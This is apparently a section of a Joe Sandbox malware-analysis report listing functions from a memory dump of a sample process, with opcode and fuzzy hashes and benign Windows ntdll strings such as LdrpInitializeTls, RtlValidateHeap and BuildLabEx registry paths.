                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                          • API String ID: 0-1050206962
                                          • Opcode ID: 07c56430a1c173a9b86086d759c4f7906206f7bf5702d51fcaeda1b4b07a927f
                                          • Instruction ID: 0a7de58c6a176a1bf44455be76312add4dee69accd63b1842e863f4b3b9bd70a
                                          • Opcode Fuzzy Hash: 07c56430a1c173a9b86086d759c4f7906206f7bf5702d51fcaeda1b4b07a927f
                                          • Instruction Fuzzy Hash: C331AE76D0021DAFEB11CF95CC84EAEBBBDEB44B54F810465EA14A7210DB78DD048BA0
                                          Strings
                                          • minkernel\ntdll\ldrtls.c, xrefs: 32911A51
                                          • LdrpInitializeTls, xrefs: 32911A47
                                          • DLL "%wZ" has TLS information at %p, xrefs: 32911A40
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                          • API String ID: 0-931879808
                                          • Opcode ID: d67384027bdb7b9dd455554742ed8f2e882e3fb3c2a901a3a38456586a90fdf1
                                          • Instruction ID: 23bd645c3d7b8b7f5606bff3626b69cc39b0052fcbd966237d290a10409c5dd5
                                          • Opcode Fuzzy Hash: d67384027bdb7b9dd455554742ed8f2e882e3fb3c2a901a3a38456586a90fdf1
                                          • Instruction Fuzzy Hash: DB310079A44304BFF7108B59CC80FAB77A8EF41BA5F040459E905B7281EBB0AD49C7A0
                                          Strings
                                          • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 328E127B
                                          • @, xrefs: 328E12A5
                                          • BuildLabEx, xrefs: 328E130F
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                          • API String ID: 0-3051831665
                                          • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                          • Instruction ID: debdfd67cbec998d1e1fc07e7441852375ad665de586460cb6193ffdd49360d3
                                          • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                          • Instruction Fuzzy Hash: 2A316F7990061CEFDB11DBA9CC40EDEBBB9EB85B54F044025E925A7260DB74DE058B50
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: RtlValidateHeap
                                          • API String ID: 3446177414-1797218451
                                          • Opcode ID: a76276e1a48649db1ad340562d557db4a0418c42dc14935c8e4bd59bee41ab06
                                          • Instruction ID: a4008dd8b3b0c58dadfdbb1b618390bc9749c695f84607346655000405006ac0
                                          • Opcode Fuzzy Hash: a76276e1a48649db1ad340562d557db4a0418c42dc14935c8e4bd59bee41ab06
                                          • Instruction Fuzzy Hash: 05414CBEB00345EFDB01CF68D4907EEB7B2BF85724F048659D8696B280DB359901CB90
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: kLsE
                                          • API String ID: 3446177414-3058123920
                                          • Opcode ID: edbbfe6e109a18dd0a0161fc5f4ba2c7daf5728748c7cb0a8835c64ebff74c86
                                          • Instruction ID: 7fcd9f8ee667e6c45f5cc0e1c21fc2fb3ae81bf50fb28677a64409e28c307bb7
                                          • Opcode Fuzzy Hash: edbbfe6e109a18dd0a0161fc5f4ba2c7daf5728748c7cb0a8835c64ebff74c86
                                          • Instruction Fuzzy Hash: 084127B558B3598BF721DB64CC84BB93B98BB40778F100959EC60AA1C5CFB454C7C7A1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@
                                          • API String ID: 0-149943524
                                          • Opcode ID: 6a7d6597f3daf0d4f2b40c6f688688bdb5171399fd30fa10e5875eb39277adcb
                                          • Instruction ID: 53a27e75dba27e514f18b2b3a65fa467e75aa4f3f7c232c0280a4ec0bb0b2597
                                          • Opcode Fuzzy Hash: 6a7d6597f3daf0d4f2b40c6f688688bdb5171399fd30fa10e5875eb39277adcb
                                          • Instruction Fuzzy Hash: 6B32ADB85093558FDB24CF14C49072EB7E5EF89748F50891EF9999B3A0EB78C884CB52
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: ce0cb324debdea1c646598f6f933fe0061f2db035cb9bb9928b63ac4fa5f103b
                                          • Instruction ID: 7c552b80bf13d6409b914fa92de94f7d53f7a317548b5e63990685cd36e83fd6
                                          • Opcode Fuzzy Hash: ce0cb324debdea1c646598f6f933fe0061f2db035cb9bb9928b63ac4fa5f103b
                                          • Instruction Fuzzy Hash: FC31CE39602B0AEFE7558F64C990B89FBB9BF44754F405025E91467A50DFB4E860CFD0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$AddD
                                          • API String ID: 0-2525844869
                                          • Opcode ID: 6f52a86ff119856f87c79c7dc965f4509cb75d0ae5500fd75dce0ef1612e1669
                                          • Instruction ID: a06bf677bff821ef318b88e783c35855b183028ad4fa1a214b7a44e74d9c6fea
                                          • Opcode Fuzzy Hash: 6f52a86ff119856f87c79c7dc965f4509cb75d0ae5500fd75dce0ef1612e1669
                                          • Instruction Fuzzy Hash: BEA18BB6504348AFE315CB54C844BABB7EDFF84B08F404A2EF99586155E7B0E914CB62
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID: $$$
                                          • API String ID: 3446177414-233714265
                                          • Opcode ID: 5c7ea2d2538c1adef79440cfcedd690c950b59f379520bcb9ac70afa6a5a70f7
                                          • Instruction ID: 681cba922f3deb1cf6c012cb3093d24e20ee4915eafc2f7610cc4e01cfba9586
                                          • Opcode Fuzzy Hash: 5c7ea2d2538c1adef79440cfcedd690c950b59f379520bcb9ac70afa6a5a70f7
                                          • Instruction Fuzzy Hash: 2C618E79A04749DFEF20CFA8C580BADB7B5BF58708F10446DE5286B780CBB4A945CB90
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                          • API String ID: 0-118005554
                                          • Opcode ID: d750e19afec451c2d719a01599738f1fa0c359022d36631f563d272570a9a78a
                                          • Instruction ID: e51ab420f2582ece1d8841aacaba6e30b2020f5205002d1e842f2c83a22aa363
                                          • Opcode Fuzzy Hash: d750e19afec451c2d719a01599738f1fa0c359022d36631f563d272570a9a78a
                                          • Instruction Fuzzy Hash: A131037924A7419FD302CF28D845B1AB3E8EF89758F08086DF954CB390EBB4D805CB96
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .Local\$@
                                          • API String ID: 0-380025441
                                          • Opcode ID: 2b86d76eb8256460c9c0b86b39e864c3fea33b5fdf682e61cbe3a8e5350a83e4
                                          • Instruction ID: bd8005510a4370be8767de51d6b5a3396c5f40141b6945ebff4a8edc1c95d0a9
                                          • Opcode Fuzzy Hash: 2b86d76eb8256460c9c0b86b39e864c3fea33b5fdf682e61cbe3a8e5350a83e4
                                          • Instruction Fuzzy Hash: 2C3190BA5493449FE315CF28D980A5BBBE8EFC5794F44092EF99893210DA34DD08CF92
                                          Strings
                                          • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32912A95
                                          • RtlpInitializeAssemblyStorageMap, xrefs: 32912A90
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                          • API String ID: 0-2653619699
                                          • Opcode ID: 7c96d66b7a66fd7c098051d8611c5690d7eea35d630a018e84f34a9a2dd2e346
                                          • Instruction ID: 70747eaf857cd9ffff3d1b5abf71d309f8091ad954cda9ce0286e0389196788b
                                          • Opcode Fuzzy Hash: 7c96d66b7a66fd7c098051d8611c5690d7eea35d630a018e84f34a9a2dd2e346
                                          • Instruction Fuzzy Hash: 4E112C7DB00318AFF7158A498D41F5B77AD9B94B54F14C0697A04EB2C4DA78ED04C690
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: fbe65cb43804b20a29ba0c6f33b62a740459de33c84968fed265c577913ae8ac
                                          • Instruction ID: 4db899979a84113f8cab50d9efb73977965c516433c20997005a7cc536a8bdef
                                          • Opcode Fuzzy Hash: fbe65cb43804b20a29ba0c6f33b62a740459de33c84968fed265c577913ae8ac
                                          • Instruction Fuzzy Hash: F4B111B9A093409FD354CF28C480A5ABBF1BF88708F54896EE899D7352D771E945CB82
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7e9fb1ab086e1e48df0b33df9bc3f2771261c8885bb44dc630f18300441d91c6
                                          • Instruction ID: 6ee973c3065a86929d79fca00ba9f6baf78a90c865854c8c6fc62297bdcad091
                                          • Opcode Fuzzy Hash: 7e9fb1ab086e1e48df0b33df9bc3f2771261c8885bb44dc630f18300441d91c6
                                          • Instruction Fuzzy Hash: 19A19A79A08305CFE314CF28C490A1EBBE5BF88744F14896EE99897351EB70E945CF92
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5514ae408ce71be927cc75e24398741ce3ff54de99a0128e025658f0651bb07
                                          • Instruction ID: bd6daba309829ee7d1f34b20a60ca72d76bf3607cb5816617a9718300ee1b424
                                          • Opcode Fuzzy Hash: f5514ae408ce71be927cc75e24398741ce3ff54de99a0128e025658f0651bb07
                                          • Instruction Fuzzy Hash: 76613E79A05606AFEB08CF68C490BADFBB5BF88340F14856ED429A7340DF70A945DBD4
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fe8884f3284e82fd73d8c72ff7310478334907869114a477a50c07a91b5326cc
                                          • Instruction ID: 2af7d1449870ce7de1a6d26325f733cd478c1db9679422de122f56978119819e
                                          • Opcode Fuzzy Hash: fe8884f3284e82fd73d8c72ff7310478334907869114a477a50c07a91b5326cc
                                          • Instruction Fuzzy Hash: 24419BB8D012889FDB10CFAAD890AAEBBF4FB48700F50812ED458A7602CB709945CF60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: 46c9ef9d40a1cd87517580094c57bc388860eead534f204108323400034ec898
                                          • Instruction ID: 25a6b546eca6b87e971d757d5265acdbc8324577ab505e8875c9cc2a7728f18e
                                          • Opcode Fuzzy Hash: 46c9ef9d40a1cd87517580094c57bc388860eead534f204108323400034ec898
                                          • Instruction Fuzzy Hash: 95E1B379E002698FDB24CF99C4807ADB7F5FF44B44FA0815AE845EB294DBB49C86CB50
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 02e922f2bd1c213cb08ee147359ff2f038ff062d7c53d28dd5276b982948f8bb
                                          • Instruction ID: dd9cade3de7b4aeca251ae47701da1461c3cb3a7921032574d6009220c147459
                                          • Opcode Fuzzy Hash: 02e922f2bd1c213cb08ee147359ff2f038ff062d7c53d28dd5276b982948f8bb
                                          • Instruction Fuzzy Hash: 0531217A600204AFD711DF1CC880A9A77A9FF85764F50866DEC589B391DB71ED42CBD0
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 54275b833c0f97801df067fb232c63aa258ee7e635237b6ce90068c877d8fae0
                                          • Instruction ID: 629855b33a6b0e069bea407af8fa968e48b1501efc1fdb8439372eb882d5ea8e
                                          • Opcode Fuzzy Hash: 54275b833c0f97801df067fb232c63aa258ee7e635237b6ce90068c877d8fae0
                                          • Instruction Fuzzy Hash: E5318139A16A09FFE7458F24CA50A5ABBA6FF44350F449029ED1087F51DB75E870CF80
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 29f78c7c9dd4c8a217b5fcca75e8763a9efcb0bf247bc92f570efeda52e6b282
                                          • Instruction ID: 627ca6fd8cd6710d9d9184bc330f76e861f5c5381fd1d6706d20fbd652859e2f
                                          • Opcode Fuzzy Hash: 29f78c7c9dd4c8a217b5fcca75e8763a9efcb0bf247bc92f570efeda52e6b282
                                          • Instruction Fuzzy Hash: 6421FD7D2057509FEB619F08C9A4B5ABBA0FF81B24F41086DED480BB95DEB1E844CBD1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID: DebugPrintTimes
                                          • String ID:
                                          • API String ID: 3446177414-0
                                          • Opcode ID: 2b59015246f0868c49a508e00ae2a644fabe1b82f948874399de4b36c1d364f6
                                          • Instruction ID: e586a67083f335009ef89cdca1d97393b0df273e390e0aef0b1b7d4e255c3e6d
                                          • Opcode Fuzzy Hash: 2b59015246f0868c49a508e00ae2a644fabe1b82f948874399de4b36c1d364f6
                                          • Instruction Fuzzy Hash: 2DF09036104644ABE7319F59CD04F9ABBEDEF84750F18051DA54693190D6A1A946C660
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction ID: 171f5314ea86e78b836779a39a2b341b6a238abe34c00da07fb5d85f4e19c908
                                          • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                          • Instruction Fuzzy Hash: E7615C79D0525DEFEB11CFA9C850BDEBBB8FF84754F104129E924AB250DB749A01CB60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction ID: fd543b8f7d007e90ffa19bc89cbd8eedc62cdbec01e23a663299891223e2d935
                                          • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                          • Instruction Fuzzy Hash: 0B51BEBA504749AFE7118F58C840F5BB7E8FF84754F40092DBA90A7290DBB4ED04CB91
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: PreferredUILanguages
                                          • API String ID: 0-1884656846
                                          • Opcode ID: aeaf187bd2cb6dac2757e9458c4ea07dbf99497fbf20cd2b073e6b6aca25feb4
                                          • Instruction ID: 2197bf7409d27f72559769d6e1aa4aead79385adf7461b347601dab2dc3b75a9
                                          • Opcode Fuzzy Hash: aeaf187bd2cb6dac2757e9458c4ea07dbf99497fbf20cd2b073e6b6aca25feb4
                                          • Instruction Fuzzy Hash: 8041067AE01219ABDF11DE98C860BEEB3BDEF44754F21012AE915F7258DA74DE40C7A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.3362178901.0000000032870000.00000040.00001000.00020000.00000000.sdmp, Offset: 32870000, based on PE: true
                                          • Associated: 00000004.00000002.3362178901.0000000032999000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.000000003299D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          • Associated: 00000004.00000002.3362178901.0000000032A0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_32870000_wmKmOQ868z.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: verifier.dll
